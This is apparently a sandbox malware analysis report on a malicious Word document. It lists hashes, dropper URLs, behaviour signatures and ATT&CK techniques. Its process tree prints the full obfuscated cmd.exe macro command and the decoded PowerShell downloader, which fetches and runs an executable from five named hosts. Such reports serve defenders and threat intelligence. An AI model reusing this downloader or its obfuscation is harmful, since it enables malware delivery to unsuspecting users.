22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8

General

Target

22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc
Size

105KB
MD5

ed8ef17ea6d7cf17d582cf27c0026b01
SHA1

8a876c8c80f607347d11d07e262b8c59396ef115
SHA256

22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8
SHA512

01c454eebf9246c987db12455a68bd72c6208197b1b1511afa9888f2dc5467f4153e12c8ba41de33a32f8cbf2d38b38a8c2491bd5d05a5ae48fa91d06b4ccd57
SSDEEP

1536:fuwocn1kp59gxBK85fBU8NGo67Di7lSbKexUtrxBk7PvwVIvbVJXKDiFayL:g41k/W48+8NGoGD0loKexMjIVJaDiFa

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://liarla.com/RqAjQLJlx

exe.dropper

http://espasat.com/1YbH45y

exe.dropper

http://latuconference.com/wp-content/uploads/vvl9XHG

exe.dropper

http://dirtyactionsports.com/vVgr4dva

exe.dropper

http://demign.com/PGT53cb

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4080	4120	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

22 2476 powershell.exe
89 2476 powershell.exe
91 2476 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2476 powershell.exe

flow	pid	process
22	2476	powershell.exe
89	2476	powershell.exe
91	2476	powershell.exe

pid	process
2476	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4120 WINWORD.EXE
4120 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2476 powershell.exe
2476 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2476 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

4120 WINWORD.EXE
4120 WINWORD.EXE
4120 WINWORD.EXE
4120 WINWORD.EXE
4120 WINWORD.EXE
4120 WINWORD.EXE
4120 WINWORD.EXE

pid	process
4120	WINWORD.EXE
4120	WINWORD.EXE

pid	process
2476	powershell.exe
2476	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2476	powershell.exe

pid	process
4120	WINWORD.EXE
4120	WINWORD.EXE
4120	WINWORD.EXE
4120	WINWORD.EXE
4120	WINWORD.EXE
4120	WINWORD.EXE
4120	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WINWORD.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 4120 wrote to memory of 1772	4120	WINWORD.EXE	splwow64.exe
PID 4120 wrote to memory of 1772	4120	WINWORD.EXE	splwow64.exe
PID 4120 wrote to memory of 4080	4120	WINWORD.EXE	cmd.exe
PID 4120 wrote to memory of 4080	4120	WINWORD.EXE	cmd.exe
PID 4080 wrote to memory of 624	4080	cmd.exe	cmd.exe
PID 4080 wrote to memory of 624	4080	cmd.exe	cmd.exe
PID 624 wrote to memory of 4944	624	cmd.exe	cmd.exe
PID 624 wrote to memory of 4944	624	cmd.exe	cmd.exe
PID 624 wrote to memory of 4044	624	cmd.exe	cmd.exe
PID 624 wrote to memory of 4044	624	cmd.exe	cmd.exe
PID 4044 wrote to memory of 2476	4044	cmd.exe	powershell.exe
PID 4044 wrote to memory of 2476	4044	cmd.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4120
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1772
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c %pROGraMdATa:~0,1%%ProGrAmDAtA:~9,2% /v:ON/C"SeT 0Kj=poZ^%PUy6PLIC:~5,1^%r^%7E77IONN6ME:~-(,1^%h^%TEMP:~-3,1^%ll $etailersf=Jobac#grou]d`Jo;$c[a]R=]eZ-ob}ect Net.WebClie]t;$I]credible}=Johttp://liarla.com/R`6}QLJlx@http://espasat.com/1Ybk(5[@http://latuco]fere]ce.com/Zp-co]te]t/uploads/vvl9XkG@http://dirt[actio]sports.com/vVgr(dva@http://demig].com/PGT53cbJo.7plit?Jo@Jo);$Tast[7oftComputerP=JovioletWJo;$CreditCard6ccou]tG = Jo(08Jo;$Woode]p=Jorevolutio]i2eOJo;$6vo]u=$e]v:public+Jo\Jo+$CreditCard6ccou]tG+Jo.exeJo;foreach?$Lice]sedt i] $I]credible}){tr[{$c[a]R.DoZ]loadqpile?$Lice]sedt, $6vo]u);$programmi]gy6P=JomodelsTJo;If ??Get-Item $6vo]u).le]gth -ge 80000) {I]vo#e-Item $6vo]u;$y6Proo#s2=JoProactive7Jo;brea#;__catch{__$y6Per#shireQ=JoorchestratehJo;&& seT R2W=!0Kj:(=4!&& sEt IOl=!R2W:Jo='!&& sET 1f=!IOl:?=(!&set kKg=!1f:qp=F!& SET WK=!kKg:y6P=B!& SeT JtU=!WK:]=n!& SET p6=!JtU:k=H!& set 5ql=!p6:#=k!&& SET aR=!5ql:6=A!&& seT Ay=!aR:}=j!& SEt UNIF=!Ay:_=}!& SeT fmBy=!UNIF:`=q!& sET 8ps=!fmBy:[=y!&& set kMJ4=!8ps:7=S!& SeT ImBE=!kMJ4:Z=w!&& SET le=!ImBE:2=z!&&EChO %le% | cmD.ExE "
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\system32\cmd.exe
    CmD /v:ON/C"SeT 0Kj=poZ^%PUy6PLIC:~5,1^%r^%7E77IONN6ME:~-(,1^%h^%TEMP:~-3,1^%ll $etailersf=Jobac#grou]d`Jo;$c[a]R=]eZ-ob}ect Net.WebClie]t;$I]credible}=Johttp://liarla.com/R`6}QLJlx@http://espasat.com/1Ybk(5[@http://latuco]fere]ce.com/Zp-co]te]t/uploads/vvl9XkG@http://dirt[actio]sports.com/vVgr(dva@http://demig].com/PGT53cbJo.7plit?Jo@Jo);$Tast[7oftComputerP=JovioletWJo;$CreditCard6ccou]tG = Jo(08Jo;$Woode]p=Jorevolutio]i2eOJo;$6vo]u=$e]v:public+Jo\Jo+$CreditCard6ccou]tG+Jo.exeJo;foreach?$Lice]sedt i] $I]credible}){tr[{$c[a]R.DoZ]loadqpile?$Lice]sedt, $6vo]u);$programmi]gy6P=JomodelsTJo;If ??Get-Item $6vo]u).le]gth -ge 80000) {I]vo#e-Item $6vo]u;$y6Proo#s2=JoProactive7Jo;brea#;__catch{__$y6Per#shireQ=JoorchestratehJo;&& seT R2W=!0Kj:(=4!&& sEt IOl=!R2W:Jo='!&& sET 1f=!IOl:?=(!&set kKg=!1f:qp=F!& SET WK=!kKg:y6P=B!& SeT JtU=!WK:]=n!& SET p6=!JtU:k=H!& set 5ql=!p6:#=k!&& SET aR=!5ql:6=A!&& seT Ay=!aR:}=j!& SEt UNIF=!Ay:_=}!& SeT fmBy=!UNIF:`=q!& sET 8ps=!fmBy:[=y!&& set kMJ4=!8ps:7=S!& SeT ImBE=!kMJ4:Z=w!&& SET le=!ImBE:2=z!&&EChO %le% | cmD.ExE "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" EChO %le% "
      4⤵
      PID:4944
  - - C:\Windows\system32\cmd.exe
      cmD.ExE
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4044
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $etailersf='backgroundq';$cyanR=new-object Net.WebClient;$Incrediblej='http://liarla.com/RqAjQLJlx@http://espasat.com/1YbH45y@http://latuconference.com/wp-content/uploads/vvl9XHG@http://dirtyactionsports.com/vVgr4dva@http://demign.com/PGT53cb'.Split('@');$TastySoftComputerP='violetW';$CreditCardAccountG = '408';$Woodenp='revolutionizeO';$Avonu=$env:public+'\'+$CreditCardAccountG+'.exe';foreach($Licensedt in $Incrediblej){try{$cyanR.DownloadFile($Licensedt, $Avonu);$programmingB='modelsT';If ((Get-Item $Avonu).length -ge 80000) {Invoke-Item $Avonu;$Brooksz='ProactiveS';break;}}catch{}}$BerkshireQ='orchestrateh';
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C92E9F47.wmf

Filesize
494B

MD5
596a971703d4d76c4188911f090aee28

SHA1
c93dbd0c214180eef682c885d60022a507073973

SHA256
1fde63479b764f4c992d4efc6d0399f15e835af269aa7fed4c13426fa52d00f0

SHA512
7190c2f550e27f5652248db588215e3e6e67d13df4bd1c5cc9e2745920c70a648cd08cc3a34dced1ca23b13b2c80ee915485652efca274fc75b3afb19a5ac448

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDF4DE.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxnlwd4g.esd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
memory/2476-54-0x000001E67E700000-0x000001E67E722000-memory.dmp

Filesize
136KB

Download
memory/4120-6-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-16-0x00007FFCC8D20000-0x00007FFCC8D30000-memory.dmp

Filesize
64KB

Download
memory/4120-8-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-7-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-12-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-13-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-11-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-10-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-14-0x00007FFCC8D20000-0x00007FFCC8D30000-memory.dmp

Filesize
64KB

Download
memory/4120-15-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-9-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-0-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/4120-5-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/4120-4-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/4120-3-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/4120-2-0x00007FFCCB3D0000-0x00007FFCCB3E0000-memory.dmp

Filesize
64KB

Download
memory/4120-70-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-71-0x00007FFD0B3ED000-0x00007FFD0B3EE000-memory.dmp

Filesize
4KB

Download
memory/4120-72-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-73-0x00007FFD0B350000-0x00007FFD0B545000-memory.dmp

Filesize
2.0MB

Download
memory/4120-1-0x00007FFD0B3ED000-0x00007FFD0B3EE000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads